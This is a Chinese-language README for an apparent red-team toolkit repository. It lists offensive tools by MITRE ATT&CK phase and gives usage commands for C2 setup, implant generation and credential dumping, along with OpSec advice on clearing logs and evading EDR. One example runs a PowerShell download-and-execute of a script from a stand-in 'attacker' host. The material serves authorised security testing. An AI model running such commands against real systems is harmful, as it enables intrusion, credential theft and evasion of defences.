Panda1847/red-team-arsenal

      **一套面向专业红队行动的综合攻击性安全工具包** [功能](#-features) • [安装](#-installation) • [工具](#-tools) • [使用](#-usage) • [文档](#-documentation) ## 🌟 概述 红队武器库汇集了专业渗透测试人员和红队操作员使用的最高效攻击性安全工具、脚本和载荷。该仓库将用于侦察、利用、后渗透和持久化的前沿工具整合到一个组织良好的单一框架中。 ### 🎖️ 为何选择此武器库？ - 🔥 **精选工具** - 仅包含经过实战检验、持续维护的工具 - 📦 **一站式获取** - 一个仓库满足所有需求 - 🚀 **快速部署** - 自动化安装脚本 - 📚 **详尽文档** - 详细的使用指南和示例 - 🔄 **定期更新** - 工具每月更新 - 🎯 **注重实战** - 使用实际任务中运用的技术 - 🛡️ **行动安全意识** - 内置操作安全考量 ### 核心能力 | 类别 | 工具数量 | 描述 | |----------|----------|------| | **侦察** | 15+ 个工具 | 网络扫描、OSINT、子域名枚举 | | **初始访问** | 20+ 个工具 | 钓鱼、漏洞利用、密码攻击 | | **执行** | 10+ 个工具 | 命令执行、脚本框架 | | **持久化** | 8+ 个工具 | 后门、计划任务、注册表操作 | | **权限提升** | 12+ 个工具 | Linux/Windows 权限提升、内核漏洞利用 | | **防御规避** | 15+ 个工具 | 绕过杀软、混淆、进程注入 | | **凭据访问** | 10+ 个工具 | 密码转储、哈希破解、令牌窃取 | | **发现** | 8+ 个工具 | 网络映射、AD枚举 | | **横向移动** | 10+ 个工具 | Pass-the-hash、RDP、WMI、PSExec | | **收集** | 6+ 个工具 | 数据窃取、屏幕截图捕获 | | **命令与控制** | 8+ 个工具 | C2框架、隐蔽通道 | | **数据窃取** | 5+ 个工具 | 数据暂存与传输 | ## 📦 安装说明 ### 快速开始 ``` # 克隆仓库 git clone https://github.com/Panda1847/red-team-arsenal.git cd red-team-arsenal # 运行自动化设置 chmod +x scripts/setup.sh ./scripts/setup.sh # 验证安装 ./scripts/verify.sh ``` ### 手动安装 ``` # 安装依赖项 sudo apt update sudo apt install -y python3 python3-pip git curl wget # 安装 Python 要求 pip3 install -r requirements.txt # 安装单个工具 ./scripts/install_tools.sh ``` ### Docker 安装 ``` # 构建 Docker 镜像 docker build -t red-team-arsenal . # 运行容器 docker run -it --rm red-team-arsenal ``` ## 🛠️ 包含工具 ### 🔍 侦察与 OSINT #### 网络扫描 - **Nmap** - 网络发现与安全审计 - **Masscan** - 快速端口扫描器 - **RustScan** - 现代端口扫描器（比 Nmap 快 10 倍） - **Angry IP Scanner** - 快速网络扫描器 #### 子域名枚举 - **Subfinder** - 被动子域名发现 - **Amass** - 深入的攻击面测绘 - **Assetfinder** - 查找域名和子域名 - **Sublist3r** - 快速子域名枚举 #### 网络侦察 - **WhatWeb** - 网站扫描器 - **Wappalyzer CLI** - 技术检测 - **Waybackurls** - 从 Wayback Machine 获取 URL - **Httprobe** - 探测可用的 HTTP/HTTPS 服务器 #### 开源情报 - **theHarvester** - 邮箱、子域名、人名收集器 - **Recon-ng** - 功能齐全的侦察框架 - **Sherlock** - 追踪社交媒体账号 - **SpiderFoot** - 自动化 OSINT 收集 ### 🎯 初始访问 #### 漏洞利用框架 - **Metasploit Framework** - 渗透测试平台 - **Cobalt Strike**（商业）- 对手模拟 - **Empire** - PowerShell 后渗透代理 - **Covenant** - .NET C2 框架 #### Web 漏洞利用 - **SQLMap** - 自动化 SQL 注入 - **XSStrike** - 高级 XSS 检测 - **Commix** - 命令注入利用 - **NoSQLMap** - NoSQL 注入工具 #### 密码攻击 - **Hydra** - 网络登录破解器 - **Medusa** - 快速并行密码破解器 - **CrackMapExec** - 网络渗透测试的瑞士军刀 - **Spray** - 密码喷射工具 #### 钓鱼 - **Gophish** - 钓鱼攻击活动框架 - **Social-Engineer Toolkit (SET)** - 社工工具包 - **Evilginx2** - 中间人攻击框架 - **Modlishka** - 反向代理钓鱼工具 ### 💻 执行与后渗透 #### 命令与控制 - **Sliver** - 开源 C2 框架 - **Havoc** - 现代 C2 框架 - **Mythic** - 协作式红队平台 - **PoshC2** - PowerShell C2 框架 - **Merlin** - 跨平台后渗透 HTTP/2 C2 - **Covenant** - .NET C2 框架 - **Koadic** - Windows 后渗透 rootkit - **Pupy** - 跨平台 RAT #### Shell 与后门 - **Netcat** - 网络瑞士军刀 - **Socat** - 多功能中继器 - **Weevely** - PHP Web Shell - **Meterpreter** - 高级载荷 ### 🔓 权限提升 #### Linux 权限提升 - **LinPEAS** - Linux 权限提升脚本 - **LinEnum** - Linux 枚举脚本 - **Linux Exploit Suggester** - 内核漏洞利用建议器 - **GTFOBins** - Unix 二进制文件利用 #### Windows 权限提升 - **WinPEAS** - Windows 权限提升脚本 - **PowerUp** - PowerShell 权限提升 - **Seatbelt** - 面向安全的主机检查 - **SharpUp** - PowerUp 的 C# 移植版 - **Watson** - Windows 权限提升枚举 ### 🎭 防御规避 #### 绕过杀软 - **Veil** - 生成规避杀软的载荷 - **Shellter** - 动态 Shellcode 注入 - **Invoke-Obfuscation** - PowerShell 混淆器 - **Donut** - Shellcode 生成框架 - **ScareCrow** - 载荷创建框架 #### 进程注入 - **Process Hacker** - 进程查看与操作 - **Reflective DLL Injection** - 无需 LoadLibrary 注入 DLL - **Process Hollowing** - 代码注入技术 ### 🔑 凭据访问 #### 密码转储 - **Mimikatz** - 从内存中提取凭据 - **LaZagne** - 检索本地计算机存储的密码 - **SharpDPAPI** - DPAPI 滥用 - **Rubeus** - Kerberos 滥用工具包 - **Impacket** - 网络协议工具包 #### 哈希破解 - **Hashcat** - 高级密码恢复 - **John the Ripper** - 密码破解器 - **Hydra** - 网络登录破解器 ### 🗺️ 发现与横向移动 #### Active Directory - **BloodHound** - AD 关系映射器 - **PowerView** - AD 枚举 - **ADRecon** - AD 侦察工具 - **PingCastle** - AD 安全评估 #### 横向移动 - **PsExec** - 远程执行进程 - **WMIExec** - 基于 WMI 的横向移动 - **Evil-WinRM** - WinRM Shell - **CrackMapExec** - 网络漏洞利用工具 ### 📊 收集与数据窃取 #### 数据收集 - **LaZagne** - 密码恢复工具 - **SessionGopher** - 提取已保存的会话 - **SharpChrome** - Chrome 数据提取 - **KeeThief** - KeePass 提取 #### 数据窃取 - **DNSExfiltrator** - 通过 DNS 窃取数据 - **PyExfil** - 数据窃取框架 - **Cloakify** - 通过文本隐写术窃取数据 ## 🚀 使用说明 ### 快速参考 ``` # 设置环境 ./scripts/setup.sh # 运行侦察 ./scripts/recon.sh target.com # 启动 C2 服务器 ./scripts/c2/start_sliver.sh # 生成载荷 ./scripts/payloads/generate.sh --type windows --format exe # 运行权限提升检查 ./scripts/privesc/linux_check.sh ./scripts/privesc/windows_check.sh # 凭据转储 ./scripts/creds/dump_all.sh # 横向移动 ./scripts/lateral/psexec.sh target.local ``` ### 详细示例 #### 示例 1：全面网络侦察 ``` # 运行全面侦察 ./tools/recon/full_recon.sh example.com # 这将： # 1. 子域名枚举 # 2. 端口扫描 # 3. 服务检测 # 4. Web 技术检测 # 5. OSINT 信息收集 # 6. 生成报告 ``` #### 示例 2：Active Directory 枚举 ``` # 运行 BloodHound 收集 ./tools/ad/bloodhound_collect.sh domain.local username password # 使用 BloodHound GUI 分析 neo4j start ./tools/ad/bloodhound_gui.sh ``` #### 示例 3：部署 C2 基础设施 ``` # 启动 Sliver C2 ./scripts/c2/sliver/start.sh # 生成植入程序 ./scripts/c2/sliver/generate.sh --os windows --arch x64 --format exe # 启动监听器 ./scripts/c2/sliver/listen.sh --port 443 --protocol https ``` #### 示例 4：权限提升 ``` # Linux ./tools/privesc/linpeas.sh | tee linpeas_output.txt # Windows（从已入侵主机） powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/winpeas.ps1')" ``` ## 📚 文档 详尽的文档位于 `docs/` 目录： | 文档 | 描述 | |----------|-------------| | [SETUP.md](docs/SETUP.md) | 详细安装指南 | | [TOOLS.md](docs/TOOLS.md) | 完整工具参考 | | [TECHNIQUES.md](docs/TECHNIQUES.md) | 攻击技术与方法论 | | [PLAYBOOKS.md](docs/PLAYBOOKS.md) | 逐步任务剧本 | | [OPSEC.md](docs/OPSEC.md) | 操作安全指南 | | [EVASION.md](docs/EVASION.md) | 防御规避技术 | | [CHEATSHEET.md](docs/CHEATSHEET.md) | 快速参考命令 | | [FAQ.md](docs/FAQ.md) | 常见问题 | ## 🎓 攻击方法论 此武器库遵循 **MITRE ATT&CK 框架**： ``` 1. Reconnaissance → 2. Initial Access → 3. Execution ↓ 4. Persistence ← 5. Privilege Escalation ← 6. Defense Evasion ↓ 7. Credential Access → 8. Discovery → 9. Lateral Movement ↓ 10. Collection → 11. Command & Control → 12. Exfiltration ``` 每个阶段在武器库中都有专门的工具和脚本。 ## 🔒 操作安全 (OpSec) ### 最佳实践 - 🔐 **使用 VPN/代理** - 通过多跳路由流量 - 🎭 **轮换基础设施** - 定期更换 C2 服务器 - 🔄 **混淆载荷** - 部署前始终进行混淆 - 🚫 **规避检测** - 使用 living-off-the-land 技术 - 📝 **清理痕迹** - 移除日志和痕迹 - ⏰ **时间选择** - 融入正常工作时间 - 🎯 **针对性方法** - 避免喧闹的扫描 ### 规避技术 - **杀软规避** - 使用 Veil、Shellter 或自定义混淆 - **绕过 EDR** - 进程注入、PPID 欺骗 - **网络规避** - 域前置、DNS 隧道 - **行为规避** - 睡眠混淆、抖动 ## ⚠️ 免责声明 **重要提示：** 本工具包仅供**授权安全测试和教育目的使用**。 ### 仅限合法使用 - ✅ 仅在你拥有或获得明确书面许可测试的系统上使用 - ✅ 在任何任务前获得适当授权 - ✅ 遵循负责任的披露实践 - ✅ 遵守所有适用的法律法规 - ❌ **不要**用于未经授权的访问 - ❌ **不要**用于非法活动 - ❌ **不要**用于恶意目的 **未经授权访问计算机系统是非法的。** 用户需自行确保其对这些工具的使用符合适用法律。 ## 🛡️ 防御对策 了解攻击有助于防御者。本节记录检测方法： ### 检测特征 - **网络 IOC** - C2 流量模式 - **主机 IOC** - 可疑进程、注册表项 - **行为 IOC** - 异常认证模式 ### 缓解策略 - 实施 EDR 解决方案 - 启用 PowerShell 日志记录 - 使用应用程序白名单 - 部署网络分段 - 实施最小权限原则 - 处处启用 MFA 详细对策请参阅 [DEFENSE.md](docs/DEFENSE.md)。 ## 🔄 更新与维护 ### 更新计划 - **工具：** 每月更新 - **载荷：** 每周更新 - **文档：** 根据需要更新 ### 更新命令 ``` # 更新武器库 git pull origin main # 更新工具 ./scripts/update_tools.sh # 更新依赖项 pip3 install -r requirements.txt --upgrade ``` ## 🤝 参与贡献 欢迎贡献！请参阅 [CONTRIBUTING.md](CONTRIBUTING.md) 了解指南。 ### 贡献方式 - 🔧 添加新工具 - 📝 改进文档 - 🐛 报告错误 - 💡 建议功能 - 🎯 分享技术 - 📊 添加剧本 ## 📜 许可证 本项目采用 MIT 许可证 - 详情请见 [LICENSE](LICENSE)。 ### 第三方工具 所有包含的工具保留其原始许可证。许可信息请参阅各工具的文档。 ## 🙏 致谢 - **MITRE ATT&CK** - 框架和方法论 - **Offensive Security** - 培训和技术 - **工具作者** - 所有出色的工具创建者 - **安全社区** - 知识分享与协作 ## 📞 支持 - 📖 [文档](docs/) - 🐛 [问题追踪](https://github.com/Panda1847/red-team-arsenal/issues) - 💬 [讨论区](https://github.com/Panda1847/red-team-arsenal/discussions) ## 🗺️ 路线图 ### 版本 1.1（计划中） - [ ] 自动化载荷生成 - [ ] 自定义 C2 配置文件 - [ ] 基于 Docker 的实验环境 - [ ] 视频教程 - [ ] 移动端渗透测试工具 ### 版本 2.0（未来） - [ ] 基于 Web 的管理界面 - [ ] 自动化报告生成 - [ ] 与 SIEM 集成 - [ ] 云渗透测试工具 - [ ] 容器逃逸技术 ## 📊 统计数据    

标签：威胁模拟, 应用安全, 请求拦截, 逆向工具